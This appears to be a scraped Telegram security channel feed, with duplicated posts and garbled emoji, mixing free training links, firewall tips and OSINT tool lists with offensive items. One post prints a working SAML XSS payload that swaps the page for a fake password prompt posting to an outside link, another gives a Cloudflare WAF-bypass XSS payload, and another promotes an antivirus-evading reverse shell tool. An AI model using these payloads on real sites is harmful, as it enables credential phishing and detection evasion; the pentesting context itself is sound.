Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
๐ฆNew evasion technique that is bypassing almost all security solutions so far, taking advantage of the recovery functionality in applications. This is groundbreaking as most if not all endpoint solutions arenโt armed with any file recovery techniques and would fail to detect this attack vector.
>> Microsoft has structured word documents similar to archives, constructing any doc file with 3 sections; starting with local file headers, central file headers and end directory records. These 3 sections are linked backward starting from the end to the header.
>> Manipulating any of these sections makes it harder for any endpoint or email security solution to unpack and identify the issue, but recoverable by its intending application after its too late.
Ref: Chadi S.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
>> Microsoft has structured word documents similar to archives, constructing any doc file with 3 sections; starting with local file headers, central file headers and end directory records. These 3 sections are linked backward starting from the end to the header.
>> Manipulating any of these sections makes it harder for any endpoint or email security solution to unpack and identify the issue, but recoverable by its intending application after its too late.
Ref: Chadi S.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
๐ฆHow run the Password Reset Flaw | Live PoC - New method
Ref: Rohith S.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Ref: Rohith S.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Media is too big
VIEW IN TELEGRAM
๐ฆ The Official NASA CSRF Vulnerability Video
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ Leveling Up Our XSS Proof of Concepts at CybaVerse :
It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).
We recently encountered an XSS vulnerability within a SAML Sign-in flow โ not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
๐น Manipulate the HTML to display a fake login prompt.
๐น Capture user-entered passwords and send them to our server.
Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the applicationโs defences, this vulnerability still allowed us to:
๐น Phish user credentials via a convincing fake prompt.
๐น Demonstrate impact beyond simple alert pop-ups or redirects.
Hereโs a snippet of the payload I crafted:
โ ๏ธ <samlp:StatusCode Value="XSS POC';document.body.innerHTML='<br><h1>Authentication failed, re-enter your password</h1><br><form action="//https://lnkd.in/ecG5926A" method="post"><input type="password" name="password"><br><button type="submit">Submit</button></form>'+document.body.innerHTML;&"/> โ ๏ธ
The image below shows the entered password if someone fell for the prompt: โAuthentication failed, re-enter your password.โ
Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.
Ref: Michael Jepson
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).
We recently encountered an XSS vulnerability within a SAML Sign-in flow โ not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
๐น Manipulate the HTML to display a fake login prompt.
๐น Capture user-entered passwords and send them to our server.
Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the applicationโs defences, this vulnerability still allowed us to:
๐น Phish user credentials via a convincing fake prompt.
๐น Demonstrate impact beyond simple alert pop-ups or redirects.
Hereโs a snippet of the payload I crafted:
โ ๏ธ <samlp:StatusCode Value="XSS POC';document.body.innerHTML='<br><h1>Authentication failed, re-enter your password</h1><br><form action="//https://lnkd.in/ecG5926A" method="post"><input type="password" name="password"><br><button type="submit">Submit</button></form>'+document.body.innerHTML;&"/> โ ๏ธ
The image below shows the entered password if someone fell for the prompt: โAuthentication failed, re-enter your password.โ
Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.
Ref: Michael Jepson
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
lnkd.in
LinkedIn
This link will take you to a page thatโs not on LinkedIn
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆFREE ๐๐๐ ๐ญ๐ซ๐๐ข๐ง๐ข๐ง๐ ๐ฌ:
โ Microsoft Security Operations Analyst:
https://lnkd.in/eKTXEmna
โ TryHackMe
SOC level 1: https://lnkd.in/enkunj-B
SOC level 2: https://lnkd.in/eg4znfJr
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ Microsoft Security Operations Analyst:
https://lnkd.in/eKTXEmna
โ TryHackMe
SOC level 1: https://lnkd.in/enkunj-B
SOC level 2: https://lnkd.in/eg4znfJr
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆBypass Virustotal detection
>> Narashima is designed to bypass both Microsoft Defender and AMSI, as well as every available AV software in VirusTotal, achieving a 0% detection rate and no high malicious behaviour rate.
This tool provides a reverse shell with unmatched stealth, making it an essential asset for cybersecurity professionals focused on security research, ethical hacking, and penetration testing.
๐ก Key Highlights:
- Bypass Detection: Successfully bypasses Microsoft Defender, AMSI, and all available AV softwares with 0 detections including Google, SentinelOne, Kaspersky, Sophos.
- Zero Malicious Behavior Rate: Narashima operates without triggering any suspicious alerts.
>> Tested on : Win11 Pro
Iโve spent considerable time studying and implementing this obfuscation methodology and am thrilled with the results. Looking forward to collaborating with the community to enhance its capabilities further!
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
>> Narashima is designed to bypass both Microsoft Defender and AMSI, as well as every available AV software in VirusTotal, achieving a 0% detection rate and no high malicious behaviour rate.
This tool provides a reverse shell with unmatched stealth, making it an essential asset for cybersecurity professionals focused on security research, ethical hacking, and penetration testing.
๐ก Key Highlights:
- Bypass Detection: Successfully bypasses Microsoft Defender, AMSI, and all available AV softwares with 0 detections including Google, SentinelOne, Kaspersky, Sophos.
- Zero Malicious Behavior Rate: Narashima operates without triggering any suspicious alerts.
>> Tested on : Win11 Pro
Iโve spent considerable time studying and implementing this obfuscation methodology and am thrilled with the results. Looking forward to collaborating with the community to enhance its capabilities further!
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆCloudflare_WAF_Bypass by xss0r: NEW Meth !!!
>> Payload: <details open ontoggleโ=alert('xss0r')>
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
>> Payload: <details open ontoggleโ=alert('xss0r')>
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ14 FREE AWS Knowledge Learning Badges! ๐ฑ
What better way to strut ๐บ๐ป your AWS skills than by earning and flaunting ๐ these badges?
Here you can dive into what each badge entails, and YES, the training is absolutely FREE on AWS Skill Builder! ๐
๐ Dive into Cloud Essentials here:
https://lnkd.in/gzYfiR5W
๐ Enhance Architecting skills here:
https://lnkd.in/gxQTERJQ
๐ Learn Serverless with this:
https://lnkd.in/g_q_mChp
๐ Learn about Kubernetes on AWS:
https://lnkd.in/g9h4gzEe
๐ File Storage expertise awaits here:
https://lnkd.in/gadMBhmK
๐ Data Protection & Disaster Recovery training:
https://lnkd.in/gX_we9Gv
๐ AWS Networking Core:
https://lnkd.in/g3u_JTfK
๐ Migration lessons here:
https://lnkd.in/gKaqyA3f
๐ AWS Compute Knowledge:
https://lnkd.in/gptkhZjh
๐ AWS Data Migration Training:
https://lnkd.in/gBjaht2n
๐ Get into Cloud Game Development:
https://lnkd.in/ghz4jyKX
๐ AWS Events and Workflows here:
https://lnkd.in/gEi78XcX
๐ Dive into Media & Entertainment foundations:
https://lnkd.in/gjHBP_SF
๐ Amazon Braket at:
https://lnkd.in/gGKHpQGf
Ref: Greg Powell
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
What better way to strut ๐บ๐ป your AWS skills than by earning and flaunting ๐ these badges?
Here you can dive into what each badge entails, and YES, the training is absolutely FREE on AWS Skill Builder! ๐
๐ Dive into Cloud Essentials here:
https://lnkd.in/gzYfiR5W
๐ Enhance Architecting skills here:
https://lnkd.in/gxQTERJQ
๐ Learn Serverless with this:
https://lnkd.in/g_q_mChp
๐ Learn about Kubernetes on AWS:
https://lnkd.in/g9h4gzEe
๐ File Storage expertise awaits here:
https://lnkd.in/gadMBhmK
๐ Data Protection & Disaster Recovery training:
https://lnkd.in/gX_we9Gv
๐ AWS Networking Core:
https://lnkd.in/g3u_JTfK
๐ Migration lessons here:
https://lnkd.in/gKaqyA3f
๐ AWS Compute Knowledge:
https://lnkd.in/gptkhZjh
๐ AWS Data Migration Training:
https://lnkd.in/gBjaht2n
๐ Get into Cloud Game Development:
https://lnkd.in/ghz4jyKX
๐ AWS Events and Workflows here:
https://lnkd.in/gEi78XcX
๐ Dive into Media & Entertainment foundations:
https://lnkd.in/gjHBP_SF
๐ Amazon Braket at:
https://lnkd.in/gGKHpQGf
Ref: Greg Powell
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
lnkd.in
LinkedIn
This link will take you to a page thatโs not on LinkedIn
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆUnderstanding Cybersecurity Layers: A Comprehensive Overview
Cybersecurity is not just about implementing one solution; itโs about building multiple layers of defense to protect against various threats.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Cybersecurity is not just about implementing one solution; itโs about building multiple layers of defense to protect against various threats.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
๐ฆHow to Find Email and Phone Number of Any Instagram Account (Ethically) ๐ต๏ธโ๏ธ๐ป
๐ง Tool Used: Burp Suite
๐ Disclaimer:
This content is strictly for educational and informational purposes ๐๐, aimed at raising awareness about cybersecurity vulnerabilities and ethical hacking practices. ๐จ Unauthorized access to systems is both illegal โ and unethical. Always act responsibly and within the bounds of the law. โ๏ธ
๐ก Learn About:
โ Exploring hacking techniques for ethical purposes.
โ Identifying vulnerabilities in online platforms.
โ Strengthening your knowledge of cyber defense strategies.
๐ Cybersecurity Tip: Ethical hacking isn't about exploitationโit's about protecting systems and understanding how to safeguard digital spaces. ๐ก๏ธ๐ก
Ref: Vyankatesh Shinde
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ง Tool Used: Burp Suite
๐ Disclaimer:
This content is strictly for educational and informational purposes ๐๐, aimed at raising awareness about cybersecurity vulnerabilities and ethical hacking practices. ๐จ Unauthorized access to systems is both illegal โ and unethical. Always act responsibly and within the bounds of the law. โ๏ธ
๐ก Learn About:
โ Exploring hacking techniques for ethical purposes.
โ Identifying vulnerabilities in online platforms.
โ Strengthening your knowledge of cyber defense strategies.
๐ Cybersecurity Tip: Ethical hacking isn't about exploitationโit's about protecting systems and understanding how to safeguard digital spaces. ๐ก๏ธ๐ก
Ref: Vyankatesh Shinde
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆWEB APPLICATION PENTESTING TOOLKIT
Whether you're focusing on APIs, SSL, or directory fuzzing, this toolkit has you covered!
Ref: Rahul Raj V K
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Whether you're focusing on APIs, SSL, or directory fuzzing, this toolkit has you covered!
Ref: Rahul Raj V K
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
๐ฆ#Tips Palo Alto Firewall: Packet Flow Sequence:
In the Firewall understanding the Packet Flow Sequence is essential for troubleshooting traffic issues!
๐ด Inside to Outside Traffic ๐ด
๐ด First: Security Policy โ Checks if traffic is allowed.
๐ด Second: NAT Policy โ Translates source IP if matched.
๐ด Third: Routing Table โ Determines the next-hop to the destination.
๐ต Outside to Inside Traffic
๐ต First: NAT Policy โ Translates destination IP to internal IP.
๐ต Second: Security Policy โ Validates access to the internal resource.
๐ต Third: Routing Table โ Finds the path to the internal destination.
๐ก Pro Tip: Mastering this sequence is a game-changer for resolving connectivity and NAT issues quickly! ๐
Ref: Dahri A.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
In the Firewall understanding the Packet Flow Sequence is essential for troubleshooting traffic issues!
๐ด Inside to Outside Traffic ๐ด
๐ด First: Security Policy โ Checks if traffic is allowed.
๐ด Second: NAT Policy โ Translates source IP if matched.
๐ด Third: Routing Table โ Determines the next-hop to the destination.
๐ต Outside to Inside Traffic
๐ต First: NAT Policy โ Translates destination IP to internal IP.
๐ต Second: Security Policy โ Validates access to the internal resource.
๐ต Third: Routing Table โ Finds the path to the internal destination.
๐ก Pro Tip: Mastering this sequence is a game-changer for resolving connectivity and NAT issues quickly! ๐
Ref: Dahri A.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐
๐ซ๐๐ ๐๐๐๐ฌ ๐ญ๐จ ๐๐๐ฌ๐ญ ๐๐จ๐ฎ๐ซ ๐๐๐ง๐ญ๐๐ฌ๐ญ/๐๐๐
๐๐ค๐ข๐ฅ๐ฅ๐ฌ
๐ฒ Must-Try Platforms
1. HackTheBox: A gamified approach to pentesting with challenges ranging from easy to advanced.
๐ [https://hackthebox.com](https://hackthebox.com)
2. PicoCTF: Beginner-friendly CTF platform ideal for building foundational skills.
๐ [https://picoctf.com](https://picoctf.com)
3. OverTheWire: Focuses on building your Linux and networking fundamentals.
๐ [http://overthewire.org](http://overthewire.org)
4. PentesterLab: Offers guided exercises for learning web app security.
๐ [https://pentesterlab.com](https://pentesterlab.com)
5. Google CTF: Curated by Google, this platform provides top-notch CTF challenges.
๐ [https://lnkd.in/gs89f_zU)
6. Immersive Labs: Perfect for hands-on practice across various cybersecurity domains.
๐ https://immersivelabs.com
7. Hacker101: A free resource from HackerOne to learn and practice ethical hacking.
๐ https://ctf.hacker101.com
Ref: G.M. Faruk
@Undercodecommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฒ Must-Try Platforms
1. HackTheBox: A gamified approach to pentesting with challenges ranging from easy to advanced.
๐ [https://hackthebox.com](https://hackthebox.com)
2. PicoCTF: Beginner-friendly CTF platform ideal for building foundational skills.
๐ [https://picoctf.com](https://picoctf.com)
3. OverTheWire: Focuses on building your Linux and networking fundamentals.
๐ [http://overthewire.org](http://overthewire.org)
4. PentesterLab: Offers guided exercises for learning web app security.
๐ [https://pentesterlab.com](https://pentesterlab.com)
5. Google CTF: Curated by Google, this platform provides top-notch CTF challenges.
๐ [https://lnkd.in/gs89f_zU)
6. Immersive Labs: Perfect for hands-on practice across various cybersecurity domains.
๐ https://immersivelabs.com
7. Hacker101: A free resource from HackerOne to learn and practice ethical hacking.
๐ https://ctf.hacker101.com
Ref: G.M. Faruk
@Undercodecommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ30 MUST USE CYBERSECURITY SEARCH ENGINES
This list showcases 30 must-use cybersecurity search engines, each specializing in a specific aspect of threat intelligence, vulnerability assessment, or data reconnaissance. These tools cater to professionals seeking information about exposed credentials, vulnerabilities, DNS records, attack surfaces, public repositories, and devices on the internet.
Dehashed: Focuses on finding leaked credentials.
Security Trails: Provides DNS and domain intelligence.
DorkSearch: Enables Google Dorking for open-source intelligence.
ExploitDB: Offers a database of publicly available exploits.
ZoomEye: Scans for information about internet-connected devices and services.
Pulsedive: Centralizes threat intelligence data.
GrayHatWarfare: Specializes in indexing public S3 buckets.
PolySwarm: Scans files and URLs for malware.
FoFa: Analyzes internet-wide threat intelligence.
LeakIX: Tracks leaked and exposed web servers.
DNSDumpster: Examines DNS data for domain reconnaissance.
FullHunt: Maps attack surfaces of internet-facing systems.
AlienVault: Collects and correlates threat intelligence.
Onyphe: Aggregates cyber-threat data and intelligence.
Grep App: Searches for sensitive information in Git repositories.
URL Scan: Investigates websites for potential malicious behavior.
Vulners: Hosts a comprehensive vulnerability database.
WayBackMachine: Provides historical archived internet content.
Shodan: Lists internet-connected devices and their security risks.
Netlas: Scans devices and services exposed on the internet.
CRT.sh: Monitors SSL/TLS certificates.
Wigle: Maps wireless networks.
PublicWWW: Conducts marketing and web analysis.
Binary Edge: Delivers threat intelligence about internet assets.
GreyNoise: Analyzes internet noise for threat detection.
Hunter: Finds and verifies email addresses.
Censys: Tracks internet-facing devices and vulnerabilities.
IntelligenceX: Searches for data leaks on Tor, I2P, and other darknets.
Packet Storm: A repository for vulnerabilities and exploits.
SearchCode: Facilitates source code searches for developers.
Ref: Rahul Raj V K
@Undercodecommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
This list showcases 30 must-use cybersecurity search engines, each specializing in a specific aspect of threat intelligence, vulnerability assessment, or data reconnaissance. These tools cater to professionals seeking information about exposed credentials, vulnerabilities, DNS records, attack surfaces, public repositories, and devices on the internet.
Dehashed: Focuses on finding leaked credentials.
Security Trails: Provides DNS and domain intelligence.
DorkSearch: Enables Google Dorking for open-source intelligence.
ExploitDB: Offers a database of publicly available exploits.
ZoomEye: Scans for information about internet-connected devices and services.
Pulsedive: Centralizes threat intelligence data.
GrayHatWarfare: Specializes in indexing public S3 buckets.
PolySwarm: Scans files and URLs for malware.
FoFa: Analyzes internet-wide threat intelligence.
LeakIX: Tracks leaked and exposed web servers.
DNSDumpster: Examines DNS data for domain reconnaissance.
FullHunt: Maps attack surfaces of internet-facing systems.
AlienVault: Collects and correlates threat intelligence.
Onyphe: Aggregates cyber-threat data and intelligence.
Grep App: Searches for sensitive information in Git repositories.
URL Scan: Investigates websites for potential malicious behavior.
Vulners: Hosts a comprehensive vulnerability database.
WayBackMachine: Provides historical archived internet content.
Shodan: Lists internet-connected devices and their security risks.
Netlas: Scans devices and services exposed on the internet.
CRT.sh: Monitors SSL/TLS certificates.
Wigle: Maps wireless networks.
PublicWWW: Conducts marketing and web analysis.
Binary Edge: Delivers threat intelligence about internet assets.
GreyNoise: Analyzes internet noise for threat detection.
Hunter: Finds and verifies email addresses.
Censys: Tracks internet-facing devices and vulnerabilities.
IntelligenceX: Searches for data leaks on Tor, I2P, and other darknets.
Packet Storm: A repository for vulnerabilities and exploits.
SearchCode: Facilitates source code searches for developers.
Ref: Rahul Raj V K
@Undercodecommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ5 domains a Cloud Engineer should know:
1. ๐ Security
2. ๐ป Compute
3. ๐พ Storage
4. ๐ Database
5. ๐ Networking
๐ Starting Training ๐ NOW:
๐ถ Security Learning Plan
https://lnkd.in/eNiTnyRN
๐ถ AWS Compute Services Overview
https://lnkd.in/eSiFN88Y
๐ถ AWS Storage Learning Plan
https://lnkd.in/eFcuArhG
๐ถ AWS Database Offering
https://lnkd.in/gSbjZQhQ
๐ถ AWS Networking Core
https://lnkd.in/eUwRdA2f
Ref: Greg Powell
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
1. ๐ Security
2. ๐ป Compute
3. ๐พ Storage
4. ๐ Database
5. ๐ Networking
๐ Starting Training ๐ NOW:
๐ถ Security Learning Plan
https://lnkd.in/eNiTnyRN
๐ถ AWS Compute Services Overview
https://lnkd.in/eSiFN88Y
๐ถ AWS Storage Learning Plan
https://lnkd.in/eFcuArhG
๐ถ AWS Database Offering
https://lnkd.in/gSbjZQhQ
๐ถ AWS Networking Core
https://lnkd.in/eUwRdA2f
Ref: Greg Powell
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
lnkd.in
LinkedIn
This link will take you to a page thatโs not on LinkedIn